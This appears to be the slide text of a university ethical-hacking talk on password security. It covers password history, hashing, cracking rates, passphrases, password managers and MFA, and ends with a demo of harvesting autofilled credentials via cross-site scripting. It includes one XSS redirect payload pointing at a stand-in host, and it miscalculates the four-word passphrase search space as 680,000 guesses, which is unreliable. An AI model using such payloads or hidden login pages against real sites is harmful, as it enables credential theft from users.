Correct Horse Battery Staple

Passwords and other Fun

Introduction

Ethical Hacking @ CU

  • EH Degree for 15 or so years
  • Strong focus on Practical Aspects.
  • Excellent Student CTF team.

You teach What???

  • Cyber is essential for everyday lives.
  • Good guys who can think like the bad guys is a good thing.
  • If my folks break into your system and tell you how to fix it, its much better than the bad guys doing it

What I Do

Underflow, Overflow, Use after free

But Its not just Hacking we teach

  • Security Operations.
  • Digital Forensics
  • Legal, Ethical and Business, Factors
  • Network Security
  • Computer Science.

Fancy a Job?

  • Hard but Rewarding.
  • Not recruitment at the moment
  • If you are interested come talk to me, ready for the next round.

Talk Overview

  • Talk about a common security issue. Passwords
    • What they are
    • How we can chose good ones
    • Some of the things not to do.
  • Hack Some Things

Passwords

Passwords

History

  • Roman Empire: Watchwords
  • Prohibition: Get access to the pub

First Computer Passwords

  • 1960: First computer password. (CTSS)
    • To Control access to a shared system.
  • 1962: The first password Theft….
    • Users had a limited weekly time allocation.
    • Allen Scherr needed more time for his PHD.
    • Passwords Stored in plain text. == Print the password file.

A Necessary Evil

  • Estimate we now have 100-150 passwords to remember
    • Biometrics / Keys / Certificate based auth trends
    • BUT: The easiest and most common fallback if these fail.

Don’t be green

  • 80% of data breaches due to reused, weak or stolen passwords.

Most Common Passwords

  • What is the most common password
  • Off to seclists https://github.com/danielmiessler/SecLists/blob/master/Passwords/2023-200_most_used_passwords.txt

NCSC List (2019)

Storing Passwords

  • Hopefully not plain text
  • Hashes are used to store passwords
  • “Impossible” to reverse hash value to derive passwords
  • Not all hashes are equal.

Hashing Issue

  • To Cyberchef….
  • To Crackstation

Password Strategies

So What makes a good password?

  • Suggestions?

Uppercase, Lowercase, Numbers and Symbols?

  • swordfish
  • Swordfish
  • Swordf1sh / Swordfish1
  • Swordf1sh!

Why this?

  • Trying to introduce complexity, make them harder to guess.
    • Lowercase == 26 Letters
    • Upper Lower == 52
    • Common Symbols, Numbers etc ~ 100

Cracking Passwords

  • Try to guess the stored password
    • a, b, c, d
    • aa, ab, ac, ad ….
  • 2018 RTX2080 == 40 Billion guesses a second
  • 2022 RTX4090 == 164 Billion guesses a second.

More Complex == Harder to guess

Cracking Passwords

Obligatory XKCD

The Ideal Password

  • Nksi%c3&9#pZ$hn$jB9@bzf^1#ZKtnl1
  • Good luck remembering that

The 3 / 4 Words approach

  • Recommended by NCSC
  • Pick 4 Random Words
  • Use these as a passphrase

Correct Horse Battery Staple

More XKCD

So We are safe right ?

That ones in the List…

  • It depends on the password cracking strategy
  • If we use letter by letter, then the length is our friend
  • If we assume using the 4 words strategy
    • 170,000 words in the English Dictionary
    • 170,000 * 4 == 680,000 Guesses == Instant

Phishing for Information

  • Rather than brute force, use social engineering
  • Folk like passwords to be meaningful to them.
    • Pornstar / Starwars names
    • Numbers / Symbols are a speed-bump

Being a bit sneaky?

  • Perhaps they have use the password before?
  • Of course that information is only available to l33t Hax0rs right?

A Better Approach.

Password Managers

  • Personally, I recommend a password manager
    • Remember one or two passwords.
    • Rest are randomly generated (so strong)
    • Will also avoid re-use.

Password Managers

  • Lots of choice.
  • Still a healthy debate over wisdom of keeping things in a desirable target
  • Please Keep Autofill turned off.

MFA

  • We also should use MFA
  • Phone app, or similar used alongside password
  • Challenge -> Response when logging in.

MFA

  • Extra layer of defence, but not without its own problems.
    • Can be a PITA.
    • Buildings that are Faraday Cages
    • Not 100% Secure
  • Of course, if your phone with password manager gets stolen…

A Bit of Fun

Stealing Passwords from a Password Manager

  • Combining a web vuln to snarf credentials
  • Code is classic sort of thing GPT / Students write.

The Issue

  • Cross Site Scripting (XSS)
  • Let me inject code into the page, run on your browser

Version 1: Redirect

  • The Classic “My Facebook got hacked”
  • Ask the browser to load a different Page
<script>window.location="http://evil.org"</script>

Version 2: Fake login Page

  • Password manager detects login fields
  • Looks at site URL and checks for known passwords
  • Offers (or worse) auto completes.

Version 3: Hidden Login Page.

  • Thats a bit Noticeable though.
  • We can hide fake page from the user, but browser will still see it.

Summary

Summary

  • Passwords an essential part of life
  • Often easily guessable
  • How to make them hard to guess, but easy to remember?

Summary

  • Longer is Better
  • Don’t Reuse
  • Avoid common words

Summary

  • Password manager isn’t ideal, but its a good compromise
    • Makes it easy to have long, random passwords
    • Avoids Re-use
  • MFA is also a great idea.